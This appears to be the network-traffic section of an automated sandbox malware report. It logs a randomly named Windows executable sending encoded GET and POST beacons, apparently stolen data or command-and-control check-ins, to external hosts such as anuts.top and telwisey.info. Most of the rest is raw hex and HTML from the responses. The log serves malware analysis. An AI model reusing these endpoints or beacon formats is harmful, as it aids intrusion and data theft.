                                          Date: Thu, 04 Jul 2024 14:54:03 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          X-Powered-By: PHP/8.1.24
                                          Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Jul 4, 2024 16:54:03.888339043 CEST  1236  IN
                                          Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
Jul 4, 2024 16:54:03.888351917 CEST  448  IN
                                          Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
Jul 4, 2024 16:54:03.888365030 CEST  1236  IN
                                          Data Ascii: ss="divider"></div><h2>Register domains at Loopia</h2><p>Protect your company name, brands and ideas as domains at one of the largest domain providers in Scandinavia. <a href="https://www.loopia.com/domainnames/?utm_medium=sitelink
Jul 4, 2024 16:54:03.888379097 CEST  1236  IN
                                          Data Ascii: d more at loopia.com/loopiadns </a></p> <div class="divider"></div><h2>Create a website at Loopia - quickly and easily</h2><p>Our full-featured web hosting packages include everything you need to get started with you
Jul 4, 2024 16:54:03.888441086 CEST  430  IN
                                          Data Ascii: ww.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb"><img src="https://static.loopia.se/shared/logo/logo-loopia-white.svg" alt="Loopia AB" id="logo" /></a><br /><p><a href="https://www.loopia.com/support?


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
16          192.168.2.7  49723        194.9.94.85     80                6404  C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
Timestamp  Bytes transferred  Direction  Data
Jul 4, 2024 16:54:05.761291981 CEST  534  OUT  GET /4hda/?YbCL=+FYRabRorC7iiipcHmFJARkvcpdCy5kXHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9/f3zij1q4lqhkHJ2CNqkydCYpEmp0eXiAcXcwGmcRWkkIq9RVVQfBdjK&fhW=BLvXr6e0EhyxeX HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Host: www.xn--matfrmn-jxa4m.se
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Jul 4, 2024 16:54:06.432868004 CEST  1236  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Thu, 04 Jul 2024 14:54:06 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          X-Powered-By: PHP/8.1.24
                                          Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Jul 4, 2024 16:54:06.432897091 CEST  1236  IN
                                          Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
Jul 4, 2024 16:54:06.432912111 CEST  1236  IN
                                          Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
Jul 4, 2024 16:54:06.432948112 CEST  1236  IN
                                          Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
Jul 4, 2024 16:54:06.432966948 CEST  878  IN
                                          Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
17          192.168.2.7  49724        23.251.54.212   80                6404  C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
Timestamp  Bytes transferred  Direction  Data
Jul 4, 2024 16:54:12.061387062 CEST  775  OUT  POST /li0t/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.anuts.top
                                          Origin: http://www.anuts.top
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 217
                                          Referer: http://www.anuts.top/li0t/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Ascii: YbCL=RXwfOcHa9T4Mpn/yRQhYjJbVVIsh32JdFO0SSmNU3uRWSn7x3BFiHUjPi8l4CKmufuCpkwc+g7o+FeaCvo5evyniUr8TMjJxuBAFpS5EaEVh5zCiG8CpFKLuwTXi6kly2JJN3AsSB7ges1utpw15k9UGUs5T5Y9l3sQmf1jA00pFy9Z5tQpDoqLLlsYqZ0QJfmkEcqBemt2xyic+QA==


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
18          192.168.2.7  49725        23.251.54.212   80                6404  C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
Timestamp  Bytes transferred  Direction  Data
Jul 4, 2024 16:54:14.588407993 CEST  795  OUT  POST /li0t/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.anuts.top
                                          Origin: http://www.anuts.top
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 237
                                          Referer: http://www.anuts.top/li0t/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Ascii: YbCL=RXwfOcHa9T4MoHvyX39Y2ZbWQIsh8WJBFO4SSnJi2YBWSGLx2DtiAUjPsckyc6mpfuGhk1k+g78+FaWCv7hRuingMb8dIjJxuBAFpS8ZaAxh4DSiFY2ub6LpmjXip0l22JJ/3FI0B9keswKtqh16/NUMKc4n3LI11N4JW2P51ncn6rEb3ylv27zwhu8cOSN8dngcRI1/5aTb/w96G4eZS+BzIjrzaN71IGWX6q8=


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
19          192.168.2.7  49726        23.251.54.212   80                6404  C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
Timestamp  Bytes transferred  Direction  Data
Jul 4, 2024 16:54:17.121809959 CEST  1808  OUT  POST /li0t/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.anuts.top
                                          Origin: http://www.anuts.top
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 1249
                                          Referer: http://www.anuts.top/li0t/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
20          192.168.2.7  49727        23.251.54.212   80                6404  C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
Timestamp  Bytes transferred  Direction  Data
Jul 4, 2024 16:54:19.667346954 CEST  523  OUT  GET /li0t/?fhW=BLvXr6e0EhyxeX&YbCL=cVY/NretpRV3pSqbAwFMzZODfIM0+2Z9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfmjHLM7Y8ZEUPvisCvQ4bRBJc30+1Sfiya8KVn3bitTBOxY938FEQPd1w HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Host: www.anuts.top
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
21          192.168.2.7  49728        199.192.19.19   80                6404  C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
Timestamp  Bytes transferred  Direction  Data
Jul 4, 2024 16:54:46.311846018 CEST  787  OUT  POST /ei85/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.telwisey.info
                                          Origin: http://www.telwisey.info
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 217
                                          Referer: http://www.telwisey.info/ei85/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Ascii: YbCL=DTOKciQymv5BKJPNnpMdZc+SHA8TErrFnmydaMNwroMJ0K//6QUyT3VFYEiKcJx2CE+n0cts7L5paW2wHvRPmSp2CgzgvBTnj18tMklHYhd1oEGMP+lutG6MI8RGhYBSOKLK3Q76fsb5MCfWnVtk3Y1yxRXl9+J34dXl4Ekq8psp94P97bdPaugsGT8+oijg62MAz233d2Xs+XLcag==
Jul 4, 2024 16:54:46.924302101 CEST  1236  IN  HTTP/1.1 404 Not Found
                                          Date: Thu, 04 Jul 2024 14:54:46 GMT
                                          Server: Apache
                                          Content-Length: 16026
                                          Connection: close
                                          Content-Type: text/html
                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
Jul 4, 2024 16:54:46.924325943 CEST  224  IN
                                          Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705
Jul 4, 2024 16:54:46.924335003 CEST  1236  IN
                                          Data Ascii: ,7.488L380.857,346.164z" /> </clipPath> <clipPath id="cordClip"> <rect width="800" height="600" /> </clipPath> </defs> <g id="planet"> <circle fil
Jul 4, 2024 16:54:46.924423933 CEST  1236  IN
                                          Data Ascii: 8-1.19,93.922-3.149" /> </g> <g id="stars"> <g id="starsBig"> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10"
Jul 4, 2024 16:54:46.924436092 CEST  1236  IN
                                          Data Ascii: necap="round" stroke-miterlimit="10" x1="310.194" y1="143.349" x2="330.075" y2="143.349" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="rou
Jul 4, 2024 16:54:46.924547911 CEST  672  IN
                                          Data Ascii: 4" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="485.636" y1="303.945" x2="493.473" y2="303.945" /> </g> <g>
Jul 4, 2024 16:54:46.924598932 CEST  1236  IN
                                          Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="#0E0620" stroke
                                          Jul 4, 2024 16:54:46.924608946 CEST1236INData Raw: 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72
                                          Data Ascii: </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.952" />
                                          Jul 4, 2024 16:54:46.924618959 CEST448INData Raw: 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72
                                          Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" /> </g>
                                          Jul 4, 2024 16:54:46.924734116 CEST1236INData Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c
                                          Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
                                          Jul 4, 2024 16:54:46.929291010 CEST1236INData Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74
                                          Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit=


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          22 | 192.168.2.7 | 49729 | 199.192.19.19 | 80 | 6404 | C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Jul 4, 2024 16:54:48.852255106 CEST | 807 | OUT | POST /ei85/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.telwisey.info
                                          Origin: http://www.telwisey.info
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 237
                                          Referer: http://www.telwisey.info/ei85/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 44 54 4f 4b 63 69 51 79 6d 76 35 42 59 35 66 4e 68 49 4d 64 4d 73 2b 56 61 77 38 54 57 72 72 42 6e 68 36 64 61 4e 5a 67 72 64 63 4a 30 75 7a 2f 37 52 55 79 65 58 56 46 41 55 69 44 59 4a 78 39 43 45 79 56 30 5a 56 73 37 50 70 70 61 54 4b 77 45 63 35 4d 6b 43 70 4f 4a 41 7a 75 67 68 54 6e 6a 31 38 74 4d 67 30 71 59 68 31 31 70 78 4f 4d 4f 61 35 70 7a 32 36 50 66 4d 52 47 6c 59 42 57 4f 4b 4b 64 33 52 6e 51 66 76 6a 35 4d 43 76 57 6e 41 5a 6c 75 6f 30 35 76 68 57 4c 35 72 55 69 69 74 50 5a 67 6b 77 6b 77 35 41 4d 31 75 53 66 68 35 52 6a 45 2f 59 58 43 52 59 49 2f 45 2b 56 34 33 49 59 2b 55 44 57 43 42 79 47 7a 46 71 59 4d 52 39 4c 54 58 56 32 55 50 6b 69 77 6e 5a 72 36 2f 39 55 7a 4a 67 3d
                                          Data Ascii: YbCL=DTOKciQymv5BY5fNhIMdMs+Vaw8TWrrBnh6daNZgrdcJ0uz/7RUyeXVFAUiDYJx9CEyV0ZVs7PppaTKwEc5MkCpOJAzughTnj18tMg0qYh11pxOMOa5pz26PfMRGlYBWOKKd3RnQfvj5MCvWnAZluo05vhWL5rUiitPZgkwkw5AM1uSfh5RjE/YXCRYI/E+V43IY+UDWCByGzFqYMR9LTXV2UPkiwnZr6/9UzJg=
                                          Jul 4, 2024 16:54:49.483876944 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                          Date: Thu, 04 Jul 2024 14:54:49 GMT
                                          Server: Apache
                                          Content-Length: 16026
                                          Connection: close
                                          Content-Type: text/html
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                          Jul 4, 2024 16:54:49.483983994 CEST1236INData Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37
                                          Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
                                          Jul 4, 2024 16:54:49.483998060 CEST1236INData Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d
                                          Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
                                          Jul 4, 2024 16:54:49.484078884 CEST1236INData Raw: 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                          Data Ascii: 0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" strok
                                          Jul 4, 2024 16:54:49.484092951 CEST896INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d
                                          Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" />
                                          Jul 4, 2024 16:54:49.484103918 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e
                                          Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="#0E0620" stroke
                                          Jul 4, 2024 16:54:49.484116077 CEST1236INData Raw: 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72
                                          Data Ascii: </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.952" />
                                          Jul 4, 2024 16:54:49.484122992 CEST448INData Raw: 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72
                                          Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" /> </g>
                                          Jul 4, 2024 16:54:49.484318972 CEST1236INData Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c
                                          Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
                                          Jul 4, 2024 16:54:49.484354019 CEST224INData Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74
                                          Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round"
                                          Jul 4, 2024 16:54:49.488981962 CEST1236INData Raw: 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 20 78 31 3d 22 33 32 33 2e 33 39 36 22 20 79 31 3d 22 32 33 36 2e 36 32 35 22 20 78 32 3d 22 32 39 35 2e 32 38 35 22 20 79 32 3d 22 33 35 33 2e 37 35 33 22 20 2f 3e 0a 20 20 20
